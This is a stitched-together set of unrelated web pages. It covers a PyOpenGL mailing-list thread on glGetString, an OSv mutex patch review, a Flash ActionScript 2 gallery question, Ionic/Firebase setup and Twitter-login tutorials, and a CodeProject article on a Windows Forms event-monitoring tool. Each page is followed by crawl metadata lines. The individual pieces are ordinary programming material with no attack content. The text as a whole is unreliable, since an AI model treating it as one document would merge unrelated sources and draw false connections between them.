here's what it looks like for the generated OpenGL 1.1 wrapper from
PyOpenGL 2.0.1.08:
static PyObject *_wrap_glGetString(PyObject *self, PyObject *args) {
PyObject *resultobj;
GLenum arg1 ;
GLubyte *result;
PyObject * obj0 = 0 ;
if(!PyArg_ParseTuple(args,(char *)"O:glGetString",&obj0)) return NULL;
arg1 = (GLenum) PyInt_AsLong(obj0);
if (PyErr_Occurred()) return NULL;
{
result = (GLubyte *)glGetString(arg1);
if (GLErrOccurred()) return NULL;
}
{
if (result)
{
resultobj= PyString_FromString(result);
}
else
{
Py_INCREF(resultobj = Py_None);
}
}
return resultobj;
}
I can't see anything there which is markedly different from your
approach. PyOpenGL is fairly minimal wrt what it sets up for contexts.
AFAIK we aren't doing anything funky with initialising our reference to
OpenGL, leaving the context-creation work to the GUI libraries as much
as possible, (though I should note that that stuff would all have been
written by someone else, so it could be we spend thousands of lines of
code on it somewhere and I've just missed it during maintenance). We do
some minimal stuff such as defining functions for retrieving the current
context under OpenGL 1.0, but I doubt that's relevant.
From the docs:
()
GL_INVALID_OPERATION is generated if glGetString is executed
between the
execution of glBegin and the corresponding execution of glEnd.
I'd confirm that you are not calling this within those functions.?
Seems your check_gl_error() isn't picking up the failure for some
reason, but that doesn't solve the base problem.
Good luck,
Mike
________________________________________________
Mike C. Fletcher
Designer, VR Plumber, Coder
Mike C. Fletcher wrote:
Thanks for the help, Mike! I don't know if you remember, but I think we
met at PyCon this year; I was rambling about how horrible the scene is
for open source 3d game engines with you and Tamer ;)
> We don't do anything particularly fancy in the wrapper for glGetString,
> here's what it looks like for the generated OpenGL 1.1 wrapper from
> PyOpenGL 2.0.1.08:
>
[snip C code]
Here's the C code that's being generated from pyrex from that snippet I
showed in my post:
char (*__pyx_v_gl_vendor);
/* ... */
int __pyx_2;
/* ... */
/* "/home/radix/Projects/soya/init.pyx":307 */
__pyx_v_gl_vendor = ((char (*))glGetString(GL_VENDOR));
/* "/home/radix/Projects/soya/init.pyx":308 */
__pyx_2 = (__pyx_v_gl_vendor == 0);
if (__pyx_2) {
/* etc */
So the (__pyx_v_gl_vendor == 0) is ALWAYS true, no matter WHAT I pass to
glGetString (I tried random numbers like 9999), and glCheckError is
NEVER returning an error code. Are all of those (implicit) casts reasonable?
I also checked that the value of GL_VENDOR is expected; it's the same as
PyOpenGL.GL.GL_VENDOR.
> From the docs:
> ()
> GL_INVALID_OPERATION is generated if glGetString is executed
> between the
> execution of glBegin and the corresponding execution of glEnd.
>
> I'd confirm that you are not calling this within those functions.
I checked with Jiba, as well as the soya source code, and indications
are that it's not being called between glBegin and glEnd.
>?
Something might be going wrong with my error checking code, since no
matter what I pass to glGetString, I'm not getting any errors.
I should mention that this code is working for other people; but I don't
know if any of those other people are using the implementation of OpenGL
provided by NVidia's proprietary Linux drivers (anyone?).
Thanks for the help, I'll flail around at the problem some more.
--
Twisted | Christopher Armstrong: International Man of Twistery
Radix | Release Manager, Twisted Project
---------+
|
https://sourceforge.net/p/pyopengl/mailman/message/3123715/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Reviewed-by: Benoît Canet <ben...@scylladb.com> 2017-01-13 14:35 GMT+01:00 Nadav Har'El <n...@scylladb.com>:
Advertising
> There's no reason to use std::mutex where we can use Osv's "mutex". > std::mutex basically wraps OSv's mutex by a Posix mutex and then C++'s > mutex implementation, adding both compile-time and run-time overheads - > which are not huge, but not zero either. > > To use "mutex" we need to stop doing "using namespace std", because that > makes the name "mutex" ambiguous. > > Signed-off-by: Nadav Har'El <n...@scylladb.com> > --- > fs/vfs/vfs_mount.cc | 10 ++++------ > 1 file changed, 4 insertions(+), 6 deletions(-) > > diff --git a/fs/vfs/vfs_mount.cc b/fs/vfs/vfs_mount.cc > index ef6f29e..9e241ad 100644 > --- a/fs/vfs/vfs_mount.cc > +++ b/fs/vfs/vfs_mount.cc > @@ -53,17 +53,15 @@ > #include <memory> > #include <list> > > -using namespace std; > - > /* > * List for VFS mount points. > */ > -static list<mount*> mount_list; > +static std::list<mount*> mount_list; > > /* > * Global lock to access mount point. > */ > -static std::mutex mount_lock; > +static mutex mount_lock; > > /* > * Lookup file system. > @@ -452,11 +450,11 @@ mount_desc to_mount_desc(mount* m) > return ret; > } > > -vector<mount_desc> > +std::vector<mount_desc> > current_mounts() > { > WITH_LOCK(mount_lock) { > - vector<mount_desc> ret; > + std::vector<mount_desc> ret; > for (auto&& mp : mount_list) { > ret.push_back(to_mount_desc(mp)); > } > -- > 2.9.
|
https://www.mail-archive.com/osv-dev@googlegroups.com/msg01022.html
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
#include "petscdm.h" #include "petscdmlabel.h" #include "petscds.h" PetscErrorCode DMCreateInterpolation(DM dm1,DM dm2,Mat *mat,Vec *vec
|
http://www.mcs.anl.gov/petsc/petsc-dev/docs/manualpages/DM/DMCreateInterpolation.html
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
I've been Googling my butt off trying to find out how to do this: I have a Jersey REST service. The request that invokes the REST service contains a JSON object. My question is, from the Jersey POST method implementation, how can I get access to the JSON that is in the body of the HTTP request?
Any tips, tricks, pointers to sample code would be greatly appreciated.
Thanks...
--Steve
I'm not sure how you would get at the JSON string itself, but you can certainly get at the data it contains as follows:
Define a JAXB annotated Java class (C) that has the same structure as the JSON object that is being passed on the request.
e.g. for a JSON message:
{ "A": "a value", "B": "another value" }
Use something like:
@XmlAccessorType(XmlAccessType.FIELD) public class C { public String A; public String B; }
Then, you can define a method in your resource class with a parameter of type C. When Jersey invokes your method, the JAXB object will be created based on the POSTed JSON object.
@Path("/resource") public class MyResource { @POST public put(C c) { doSomething(c.A); doSomethingElse(c.B); } }
|
https://codedump.io/share/TMIoLlza4SL1/1/consuming-json-object-in-jersey-service
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Why does the content spill over and how do I position this under the menu and title?flash_bugged Oct 14, 2011 9:19 AM
I was following this tutorial on how to add a scrolling image gallery to a Flash website.
()
From what I understand from this tutorial, it is just a matter of copying the Actionscript code and pasting it onto the timelines then making modifications on the XML.
(kindly see a screenshot of timeline layers I made and as to where I put the Actionscript code: )
I pasted the code onto the blank keyframe labeled "Gallery"...
But all I get is this weird effect when I click on the button for the gallery...
(kindly see a screenshot of it here: )
When you put a blank keyframe on a timeline, any content put in there is supposed to only be contained in that very frame, right? How come then that - whenever the gallery button is clicked on - the content from that section spills out onto the other sections even when I click on other button for the other areas?
I just really couldn't think why this is happening - any reason why this is so?
And how do I position the gallery right under the section header and menu bar?
Here is its AS2 code, by the way:
import mx.transitions.Tween;
import mx.transitions.easing.*;
var myGalleryXML = new XML();
myGalleryXML.ignoreWhite = true;
myGalleryXML.load("gallery.xml");
myGalleryXML.onLoad = function() {
_root.gallery_x = myGalleryXML.firstChild.attributes.gallery_x;
_root.gallery_y = myGalleryXML.firstChild.attributes.gallery_y;
_root.gallery_width = myGalleryXML.firstChild.attributes.gallery_width;
_root.gallery_height = myGalleryXML.firstChild.attributes.gallery_height;
_root.myImages = myGalleryXML.firstChild.childNodes;
_root.myImagesTotal = myImages.length;
_root.thumb_height = myGalleryXML.firstChild.attributes.thumb_height;
_root.thumb_width = myGalleryXML.firstChild.attributes.thumb_width;
_root.full_x = myGalleryXML.firstChild.attributes.full_x;
_root.full_y = myGalleryXML.firstChild.attributes.full_y;
callThumbs();
createMask();
scrolling();
};
function callThumbs() {
_root.createEmptyMovieClip("container_mc",_root.getNextHighestDepth());
container_mc._x = _root.gallery_x;
container_mc._y = _root.gallery_y;
var clipLoader = new MovieClipLoader();
var preloader = new Object();
clipLoader.addListener(preloader);
for (i=0; i<myImagesTotal; i++) {
thumbURL = myImages[i].attributes.thumb_url;
myThumb_mc = container_mc.createEmptyMovieClip(i, container_mc.getNextHighestDepth());
myThumb_mc._y = _root.thumb_height*i;
clipLoader.loadClip("thumbs/"+thumbURL,myThumb_mc);
preloader.onLoadStart = function(target) {
target.createTextField("my_txt",target.getNextHighestDepth (),0,0,100,20);
target.my_txt.selectable = false;
};
preloader.onLoadProgress = function(target, loadedBytes, totalBytes) {
target.my_txt.text = Math.floor((loadedBytes/totalBytes)*100);
};
preloader.onLoadComplete = function(target) {
new Tween(target, "_alpha", Strong.easeOut, 0, 100, .5, true);
target.my_txt.removeTextField();
target.onRelease = function() {
callFullImage(this._name);
};
target.onRollOver = function() {
this._alpha = 50;
};
target.onRollOut = function() {
this._alpha = 100;
};
};
}
}
function callFullImage(myNumber) {
myURL = myImages[myNumber].attributes.full_url;
myTitle = myImages[myNumber].attributes.title;
_root.createEmptyMovieClip("fullImage_mc",_root.getNextHighestDepth());
fullImage_mc._x = _root.full_x;
fullImage_mc._y = _root.full_y;
var fullClipLoader = new MovieClipLoader();
var fullPreloader = new Object();
fullClipLoader.addListener(fullPreloader);
fullPreloader.onLoadStart = function(target) {
target.createTextField("my_txt",fullImage_mc.getNextHighestDepth (),0,0,200,20);
target.my_txt.selectable = false;
};
fullPreloader.onLoadProgress = function(target, loadedBytes, totalBytes) {
target.my_txt.text = Math.floor((loadedBytes/totalBytes)*100);
};
fullPreloader.onLoadComplete = function(target) {
new Tween(target, "_alpha", Strong.easeOut, 0, 100, .5, true);
target.my_txt.text = myTitle;
};
fullClipLoader.loadClip("full_images/"+myURL,fullImage_mc);
}
function createMask() {
_root.createEmptyMovieClip("mask_mc",_root.getNextHighestDepth());
mask_mc._x = _root.gallery_x;
mask_mc._y = _root.gallery_y;
mask_mc.beginFill(0x000000,100);
mask_mc.lineTo(_root.gallery_width,0);
mask_mc.lineTo(_root.gallery_width,_root.gallery_height);
mask_mc.lineTo(0,_root.gallery_height);
mask_mc.lineTo(0,0);
container_mc.setMask(mask_mc);
}
function scrolling() {
_root.onEnterFrame = function() {
container_mc._y += Math.cos(((mask_mc._ymouse)/mask_mc._height) *Math.PI)*15;
if (container_mc._y>mask_mc._y) {
container_mc._y = mask_mc._y;
}
if (container_mc._y<(mask_mc._y-(container_mc._height-mask_mc. _height))) {
container_mc._y = mask_mc._y-(container_mc._height- mask_mc._height);
}
};
}
1. Re: Why does the content spill over and how do I position this under the menu and title?Ned Murphy Oct 14, 2011 10:31 AM (in response to flash_bugged)1 person found this helpful
When you add content dynamically and do not plant it into a timeline-based home (such as an empty movieclip) it does not have a home on the timeline. So if you are loading your images into that dynamically created movieclip, instead, manually place an empty movieclip in that frame and load the images into there.
2. Re: Why does the content spill over and how do I position this under the menu and title?flash_bugged Oct 14, 2011 11:18 PM (in response to Ned Murphy)
So what I should have done is to put a "blank keyframe" for me to place that gallery into? Or should I have made the frame as a movie clip then put in the AS2 code within its frame?
3. Re: Why does the content spill over and how do I position this under the menu and title?Ned Murphy Oct 15, 2011 4:10 AM (in response to flash_bugged)1 person found this helpful
You should create a manually movieclip symbol with nothing in it and take a copy of it from the library and place it in the frame where you intend for the gallery to display. Give it an instance name of "container_mc" and remove the following line from your callThumbs function
_root.createEmptyMovieClip("container_mc",_root.getNextHigh estDepth());
You probably need to do the same for the mask and the full images since they appear to also be created using dynamic mc's.
4. Re: Why does the content spill over and how do I position this under the menu and title?flash_bugged Oct 15, 2011 8:49 AM (in response to Ned Murphy)
When that (gallery) has been made into a movieclip, all I have to do then is to put an AS2 that will position it in the main stage as I want it then? Any suggestion for an AS2 code that can position such? (even if it be just an algorithm or something) :-)
Pardon me if I seem to be irritating - I am starting to see things clearly anyway... sorry :-)
5. Re: Why does the content spill over and how do I position this under the menu and title?Ned Murphy Oct 15, 2011 10:40 AM (in response to flash_bugged)
If you just add the 3 empty movieclips to the stage with the names your code would have given their dynamic counterparts, and get rid of the lines that would otherwise create them dynamically, the rest of your code appears to take care of placing the movieclips where they belong. I recommend you try stuff rather than keep questioning it.
|
https://forums.adobe.com/thread/913528
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Last updated on October 1st, 2017 |
In this Ionic Firebase tutorial you’ll learn how to integrate Firebase into your Ionic Framework app.
If you don’t know what Firebase is, it’s:
A suite of Google tools and infrastructure that will help you build better apps and grow successful businesses.
In plain English, it is a Backend as a Service that offers a wide range of services, like push notifications, analytics, a Firebase real-time database and more.
We are going to be building an app from scratch, and go over the process of integrating it with Firebase. We’ll break down the process in 4 different steps:
Step #1: Make sure your development environment is up to date.
Before writing any code, we are going to take a few minutes to install everything you need to be able to build this app, that way you won’t have to be switching context between coding and installing.
The first thing you’ll do is install nodejs.
The second thing you’ll do is make sure you have Ionic, and Cordova installed, you’ll do that by opening your terminal and typing:
$ npm install -g ionic cordova
Depending on your operating system (mostly if you run on Linux or Mac) you might have to add
sudo before the
npm install.... command.
Step #2: Create the App
Now that you made sure everything is installed and up-to-date, you’re ready to create your new Ionic app.
To do this, go ahead and open your terminal, move to wherever it is that you save your projects and start the app:
$ cd Development $ ionic start myApp blank $ cd myApp
If you’re new to the terminal, what those commands do is to:
- Move you into the
Developmentfolder.
- Create a new Ionic 2 app using the blank template and calling it
myApp
- Move into the new app’s folder.
From now on, whenever you are going to type something in the terminal it’s going to be in your app’s folder unless I say otherwise.
The
npm packages that come with the project
When you use the Ionic CLI to create a new project, it’s going to do a lot of things for you, one of those things is making sure your project has the necessary
npm packages it needs.
That means, the
start command is going to install all of the requirements and more, here’s what the
package.json file should look like:
{ "dependencies": { "@angular/common": "4.1.3", "@angular/compiler": "4.1.3", "@angular/compiler-cli": "4.1.3", "@angular/core": "4.1.3", "@angular/forms": "4.1.3", "@angular/http": "4.1.3", "@angular/platform-browser": "4.1.3", "@angular/platform-browser-dynamic": "4.1.3", "@ionic-native/camera": "3.12.1", "@ionic-native/core": "3.12.1", "@ionic-native/splash-screen": "3.12.1", "@ionic-native/status-bar": "3.12.1", "@ionic/storage": "2.0.1", "firebase": "4.1.1", "ionic-angular": "3.5.0", "ionicons": "3.0.0", "rxjs": "5.4.0", "sw-toolbox": "3.6.0", "zone.js": "0.8.12" }, "devDependencies": { "@ionic/app-scripts": "^1.3.7", "typescript": "2.3.4" } }
Depending on when you read this, these packages might change (specially version numbers) so keep that in mind, also you can leave a comment below if you have any questions/issues/problems with this.
Step #3: Install Firebase
Now that everything is ready to be used, you’re going to install Firebase so we can access its SDK from inside our app. To do this, open your terminal and run:
$ npm install --save firebase
That will install the latest version of the Firebase JavaScript SDK, which is what we’ll use in this example.
Step #4: Initializing Firebase
To do this, we’re going to open our
app.component.ts file, and inside the constructor, we’re going to add this snippet of code:
firebase.initializeApp({ apiKey: "", authDomain: "", databaseURL: "", storageBucket: "", messagingSenderId: "" });
That will initialize the app, you’ll need to add the keys for your own Firebase app, you can find those keys in your Firebase’s Console:
For that to work, don’t forget to import Firebase into the file:
import firebase from 'firebase';
Bringing it all together
Right now you should have the skeleton of your app and should be ready to start coding.
Configuring this kind of things isn’t that easy, so you should be proud of what you accomplished if you’re running into any issues remember the steps we followed:
- Make sure your development environment is up to date.
- Create the App
- Install Firebase
- Initialize your Firebase App.
Now you should be ready to start adding functionality to your app.
Pingback: Implement a Search Bar on your Ionic app to filter your Firebase data()
Pingback: Allow Firebase Anonymous Users in your Ionic Framework App()
Pingback: Learn How to Validate Forms with Ionic and Firebase (Client and Server Side)()
Pingback: Ionic twitter login => A Step-by-step guide()
Pingback: Ionic Google Login: Step-by-step guide on getting it to work with Firebase()
Pingback: Firebase Phone Number Authentication()
|
https://javebratt.com/ionic-firebase-setup/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Last updated on September 30th, 2017 |
Have you tried to get Ionic Twitter login working with Firebase? There was a change when Firebase updated to V3 that made all the cool sign-in with pop-up and redirection stop working with Cordova apps. It sucked!
But then I realized something, yeah, it sucked for us as developers, but it pushed us to find a better way for our users, and it was to find the native plugins.
Why is it better for our users? Because when you used ionic twitter login in the previous version it had a pop-up to authorize the app, that pop-up was usually a browser one, and the user had to enter their twitter credentials half of the time. And that really sucks (I’m looking at you Instagram!)
That really sucks, why would I want to enter my credentials, can’t they just have a cool native pop-up so I can click and authorize it?
We’re going to be using the twitter-connect plugin and connecting to twitter using the Fabric SDK, that way, we can give a native experience to our users, instead of making our users think/do too much.
In this post, you’ll learn:
- How to set up your Fabric account.
- How to set up the Twitter Connect plugin (from Ionic Native)
- How to use the plugin to get the login token.
- Use those token credentials to sign your user into Firebase.
You’ll be able to give your users a better experience, similar to the picture below:
Ready to get started?
Make sure to get the code directly from Github so you can follow along with the post:.
Ionic Twitter Login
We’re going to break down the process in 6 steps:
- Step #1: Set up your Fabric Account.
- Step #2: Get your Fabric API Key.
- Step #3: Create your app in Fabric.
- Step #4: Install the Twitter Connect Plugin
- Step #5: Enable Twitter Authentication in Firebase.
- Step #6: Write the code to get the token from Twitter and sign the user in.
I think that intro was too long, so let’s get busy.
Step #1: Set up your Fabric Account.
How many times have I said something sucked in this post? This is going to be another one, this process sucks! 😛
There’s a lot of work on setting up your fabric account, including running Android Studio (or Xcode) installing plugins, and running a native app.
In the next few lines I’ll do my best to explain it so you don’t have to bang your head against the keyboard (like I did).
The first thing you’ll do is go to Fabric’s website and create an account
After you signup, they’ll send you a confirmation email so you can get started, go to your email and click on the link they sent you.
It will take you to a page where you can start working with Fabric, you’ll add a team name, and then it will ask you what platform you’re developing for, this is where things get tricky.
You can either select iOS or Android, one little advise, choose the one where you have the SDK and native IDE up to date, so if your Android Studio installation and Android SDK are up to date, go ahead and pick android, if not, then pick iOS.
When you pick the platform you’ll go through an on-boarding process (yup, they actually think this is good), just read through every single message and follow the instructions step by step
But basically, you need to install Fabric’s plugin in your IDE, then install the Twitter SDK into your app through the plugin, the plugin will show you how to install it, it even has a one-click install that adds everything (at least on Android it does).
Once everything is installed, you need to build and run the app, once you do, it will send a signal to Fabric letting them know that you have successfully installed and ran the SDK, which will let you pass this “pending” page:
If it doesn’t happen automatically, feel free to comment and I’ll help you debug.
Step #2: Get your Fabric API key
I don’t know why, but there’s no easy way to get this, like, I would expect you could go into settings and copy your API key, but no, that’s not what they wanted I guess.
Thankfully, Manifest Web Design, the awesome people that wrote the Twitter Connect Plugin already knew this and they had instructions on how to get your API key.
- First, go to.
- Look for the Add Your API Key block of code
- Inside the
<meta-data />block, you’ll find the value for your Fabric API key.
Easy, right? 😛
Step #3: Create your Fabric APP
It’s time to create the app we’ll be using to ask for the user’s permissions, this on the easier side of things, all you have to do is go to and click the “ADD” button, it will ask you for some information and you’ll be able to create the app.
The app will have some information on it, you’ll need to copy the CONSUMER KEY and the CONSUMER SECRET, since we’ll need them later for the plugin setup.
Step #4: Install the Twitter Connect Plugin
Now it’s time to install the Twitter Connect Plugin, for that we first need to have an Ionic Framework app created, if you don’t know how to create an Ionic app and initialize Firebase then first read this post and come back to this after you’re done.
Now that your app is created, open your terminal (you should be inside your app’s folder) and install the twitter connect plugin:
$ ionic plugin add twitter-connect-plugin --variable FABRIC_KEY=<FabricAPIKey> $ npm install --save @ionic-native/twitter-connect
Remember to change
<FabricAPIKey> with your own API key (the one we got in Step #2).
Once the plugin is installed, you’ll need to do some config, go ahead and open the
config.xml file that’s in the project root, and right before the closing
</widget> tag, add this:
<preference name="TwitterConsumerKey" value="<Twitter Consumer Key>" /> <preference name="TwitterConsumerSecret" value="<Twitter Consumer Secret>" />
Remember to change those values with the CONSUMER KEY and the CONSUMER SECRET we got in Step #3 when we created the app in Fabric.
We need to declare the
twitter-connect package as a provider in
app.module.ts now:
import { StatusBar } from '@ionic-native/status-bar'; import { SplashScreen } from '@ionic-native/splash-screen'; import { TwitterConnect } from '@ionic-native/twitter-connect'; @NgModule({ ..., ..., ..., providers: [ {provide: ErrorHandler, useClass: IonicErrorHandler}, StatusBar, SplashScreen, TwitterConnect ] }) export class AppModule {}
That’s it, everything in your app is set up and ready to be used.
Step #5: Enable Twitter Authentication in Firebase.
Now you need to tell your Firebase app to allow users to Sign-In with Twitter, for that go to your Firebase Console
Choose your app and inside the Authentication Tab go to “Sign-In Method” and enable Twitter, it’s going to ask you for an API Key and Secret, you’ll use the same you just used, the ones for the app you created in Fabric.
Step #6: Write the code to get the token from Twitter and sign the user in
We can finally start coding now 🙂
The first thing we’ll do is create a button so our user can log-in, so go ahead and open
home.html and remove the placeholder content, then add a button:
<ion-content padding> <button ion-button block <ion-icon</ion-icon> Login with Twitter </button> </ion-content>
The button is calling a function that we’ll create in the Class that will handle the login part, it also has an
ngIf tag, that makes sure you only see the button if you’re logged out (we’ll create that logic later).
If the user is logged-in, we want to show the user’s profile picture, twitter name, and full name.
<ion-content padding> <button ion-button block <ion-icon</ion-icon> Login with Twitter </button> <ion-item * <ion-avatar item-left> <img [src]="userProfile.photoURL"> </ion-avatar> <h2>{{ userProfile.displayName }}</h2> <h3>{{ userProfile.twName }}</h3> </ion-item> </ion-content>
By the end, that page will look something like this:
Now that we have that part covered, then it’s time to import everything we’ll need into
home.ts
import { Component } from '@angular/core'; import { NavController } from 'ionic-angular'; import { TwitterConnect } from '@ionic-native/twitter-connect'; import firebase from 'firebase';
- We’re importing
TwitterConnectbecause that’s the ionic native package to handle the plugin.
- And we’re importing Firebase so we can sign-in our users.
Then, right before the constructor, we need to add one variable:
userProfile: any = null;
The
userProfile will hold the information we want to show about the user.
Now initialize the
zone variable in the constructor and inject
TwitterConnect
constructor(public navCtrl: NavController, private twitter: TwitterConnect) {}
It’s time to move to our login function, we’re going to create the function and add the login functionality for twitter, go ahead and add this to your code:
twLogin(): void { this.twitter.login().then( response => { console.log(response); }, error => { console.log("Error connecting to twitter: ", error); }); }
Right there you’ll get all the twitter functionality, go ahead and run it in a phone, you should see the blue login button, when you click it you’ll get a screen like this:
If you’re inspecting the device, you’ll notice it logs the response to the console, the response looks something like this:
{ userName: 'myuser', userId: '12358102', secret: 'tokenSecret' token: 'accessTokenHere' }
We need to pass now that token and secret to Firebase so our user can log into our application.
For that first, create a credential object using the
TwitterAuthProvider method, and then pass that object to Firebase:
twLogin(): void { this.twitter.login().then( response => { const twitterCredential = firebase.auth.TwitterAuthProvider .credential(response.token, response.secret); firebase.auth().signInWithCredential(twitterCredential) .then( userProfile => {}); }, error => { console.log("Error connecting to twitter: ", error); }); }
We’re using
const twitterCredential = firebase.auth.TwitterAuthProvider .credential(response.token, response.secret);
To create a credential object and then pass it to the
signInWithCredential Firebase method, then we just need to handle the return of that function, we’ll just add the response to the
this.userProfile variable so we can use it in our HTML
twLogin(): void { this.twitter.login().then( response => { const twitterCredential = firebase.auth.TwitterAuthProvider .credential(response.token, response.secret); firebase.auth().signInWithCredential(twitterCredential) .then( userProfile => { this.userProfile = userProfile; this.userProfile.twName = response.userName; console.log(this.userProfile); }, error => { console.log(error); }); }, error => { console.log("Error connecting to twitter: ", error); }); }
We’re also adding
this.userProfile.twName = response.userName; because the firebase authentication object doesn’t have that information for us.
And that’s it, you now have a fully working authentication system using Twitter and Firebase 🙂
|
https://javebratt.com/ionic-twitter-login/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
Module to work with bencoded strings.
PyBencoder - your bencoded strings module
What is a Bencoded String?
Bencode (pronounced like B encode) is the encoding used by the peer-to-peer file sharing system BitTorrent for storing and transmitting loosely structured data.
For more info on bencoding check out.
- It provides:
- decoding of the different bencoded elements
- encoding of the allowed types (byte strings, integers, lists, and dictionaries).
Requirements
Requires Python 3 or later
Installation
python setup.py install
To run test suite:
python setup.py test
Usage
Import the module
from pybencoder.bencoder import PyBencoder
Encoding
Encoding is very easy to do. Just pass as an argument your data to encode method. It will automagically call the right encoder for you.
ben = PyBencoder()
ben.encode(123) # encode an integer ‘i123e’ ben.encode(‘123’) # encode a string ‘3:123’ ben.encode([1, 2, 3]) # encode a list ‘li1ei2ei3ee’ ben.encode([1, 2, [ 4, 5]]) # encode a slightly more complex list ‘li1ei2eli4ei5eee’ ben.encode({ ‘one’: 1, ‘two’: 2, ‘three’: 3 }) # encode a dictionary ‘d5:threei3e3:twoi2e3:onei1ee’
Decoding
Decoding is also easy to deal with. Just pass the bencoded string to decode method. Two mentions: - the first char of your bencoded string must be actually bencoded data, no garbage is allowed - at the end of the bencoded string it might be garbage data; after the extraction, you can also retrieve it
ben = PyBencoder()
ben.decode(‘i123e’) # decode an integer 123 ben.decode(‘i123esomeothergarbagedata’) # decode an integer with garbage data at the end ben.get_left() # gets what’s left -> ‘someothergarbagedata’
ben.decode(‘3:123somegarbage’) # decode a 3 chars string
ben.decode(‘li1ei2eli4ei5eee’) # decode a list [1, 2, [4, 5]]
|
https://pypi.org/project/PyBencoder3/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
How often have you coded up a simple Windows Form application to clear up the difference between similar events? Where does TextChanged get fired in the sequence KeyDown, KeyPress, KeyUp. When exactly does Load get fired in relation to other events on a complex control?
ControlInspector is designed to answer these and many other questions by hooking all events on an arbitrary windows form control; in a user control; or in a complete windows form. It will recurse through the controls collection and hook events on every sub control, and has special handling for context menus and main menus on forms to make sure that these don't get excluded.
In summary; Control Inspector is like a native .net version of Spy++ for .net events
This article is intended to accompany ContronInspector and give some insight into the techniques it uses. If you just want to use ControlInspector to diagnose your own applications, or to understand Windows Form events better then just download the compiled version of the software, and don't worry about the source!
When you first open Control Inspector you will be presented with a blank screen. You can use the File/Open option to open an arbitrary assembly (.net exe or dll file); you will then be presented with a list of Windows Forms Controls and Forms that are part of the assembly. The entry you select will be loaded into memory and instantiated either by hosting it in a form, or if it is a form it will be constructed directly. You can also use the File/Windows Forms option to display a list of available controls from the System.Windows.Forms namespace. Note that you won't be able to construct some of these controls (eg ButtonBase) because although they derive from Control they are not directly usable.
If the control is hosted in a form, you will see the ControlHostForm above. It has been written to display a red grid around your control so you can see where the control you are analysing ends.
The first tab of the event viewer, "All Events" shows a complete list of events trapped by ControlInspector in the that they sequence. You can look at individual controls by clicking on their individual tab. When you have a particular control in focus, you are able to use the property editor to make on the fly changes to the control (useful to see what effect events are fired by this, and in what order). For example, if you enable anchoring you then can see the resize events generated by resizing the hosting form.
The events are hooked before the control is displayed, so you will get all the initialisation events; and if you close the hosting form, then you will see the events fired until the control dies.
You are able to uncheck particular events to handle either by focusing on the control and using the checked list box, or by right clicking on a particular event in the event view and selecting "stop tracking this event". This option will only stop tracking events for this individual control. There are options to stop tracking groups of events for all controls (for example, all mouse movement related events) to stop your event list getting over populated.
If you aren't interested in ControlInspector under the covers, I suggest you stop reading now!
Last week I attended a Guerilla .NET course hosted by DevelopMentor. I can highly recommend this training company as the whole week was inspiring, and the instructors highly knowledgeable: You know who you are guys!
The instructors issued a challenge for the the class to come up with the best program that they could using any of the techniques that they had learnt during the week. The challenge would be judged on Thursday, so I had just a few days to get busy.
One of the topics covered on the course was Reflection and I decided to use this to discover information about Windows Forms controls and hook on to their events.
ControlInspector also has to use Reflection.Emit to generate a function and delegate that exactly corresponds to the event type to allow it to hook on to arbitrary events. It can only hook on to events that following the function prototype:
void eventName(object sender, eventargstype x)
where eventargstype derives from the EventArgs type. All the standard WindowsForms events do; and your events should also use this structure so there should be no problems with this approach.
The main part of the code is split between MainForm.cs which contains the UI and code for hooking on to events, and GenerateEventAssembly.cs which generates the IL for a function which matches a given delegate. Lets talk about the way the events are hooked in the first place:
void HookEvents(object o, string name) {
Type t = o.GetType();
...
Using Reflection, we step trhough all the events on a particular type. The EventHandlerType will be the type of the delegate required to hook on to this event; eg: void EventHandler(object sender, EventArgs e)
void EventHandler(object sender, EventArgs e)
foreach(EventInfo ei in t.GetEvents())
{
// Discover type of event handler
Type eventHandlerType = ei.EventHandlerType;
// eventHandlerType is the type of the delegate
// (eg System.EventHandler)
// what we need, is to find the type of the second parameter of the
// delegate, eg System.EventArgs
MethodInfo mi = eventHandlerType.GetMethod("Invoke");
ParameterInfo[] pi = mi.GetParameters();
Now comes the magic. The function GetEventConsumerType generates an a class dynamically that has a method "HandleEvent" of exactly the right types. This class is derived from ControlEvent, which contains a function void GenericHandleEvent(object sender, object eventargs) so the generated code is kept to a minimum (I can't write IL for toffee: I wrote a class in C# which did the required type conversion, ran ILDASM on it, then used that as a basis to automatically generate these arbitrary types).
GetEventConsumerType
HandleEvent
void GenericHandleEvent(object sender, object eventargs)
// Get a class derived from ControlEvent which has a HandleEvent method
// taking the appropriate parameters
ControlEvent ce
= GenerateEventAssembly.Instance.GetEventConsumerType(pi[1].ParameterType);
// Hook onto this control event to get the details of all events fired
ce.ControlName = name;
ce.EventName = ei.Name;
ce.EventTrackInfo = trackInfo;
ce.EventFired += new EventHandler(eventFired);
controlEventList.Add(ce);
// Wire up the event handler to our new consumer
Delegate d = Delegate.CreateDelegate(eventHandlerType, ce, "HandleEvent");
ei.AddEventHandler(o, d);
}
...
Finally, if this is a control type, we recurse through sub-controls
if (o is Control) {
Control c = (Control) o;
if (c.Controls != null) {
foreach(Control subControl in c.Controls) {
HookEvents(subControl, name + "/" + ControlName(subControl));
}
}
...
}
The code to do the IL generation is quite well commented, so I won't go into greater detail about that here.
void AddEventsToTreeView(ControlEvent ce, TreeView treeView,
bool includeControlName)
Because of the generic way in which events are hooked up, there is a test user control contained in the ControlInspector.exe - UserControlTest. This contains a button which fires off a user-defined event just to prove that everything is working correctly.
Removing the tab pages from the form when a new control is loaded exhibits a strange bug in the 1.0 framework which I have tried my best to work around. My thanks to instructor Ian Griffiths who helped me with this issue.
I didn't win the Thursday Challenge!
The current project has been tested under VS.NET 2002 and VS.NET 2003, and it works fine on both of them. The downloadable file is a VS.NET 2002 project, but works fine if you upgrade it. I will be releasing a new version with some more changes soon.
1.0 Initial release
This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
Reflection.Emit
General News Suggestion Question Bug Answer Joke Praise Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
|
https://www.codeproject.com/Articles/3317/ControlInspector-monitor-Windows-Forms-events-as-t?msg=855358
|
CC-MAIN-2017-43
|
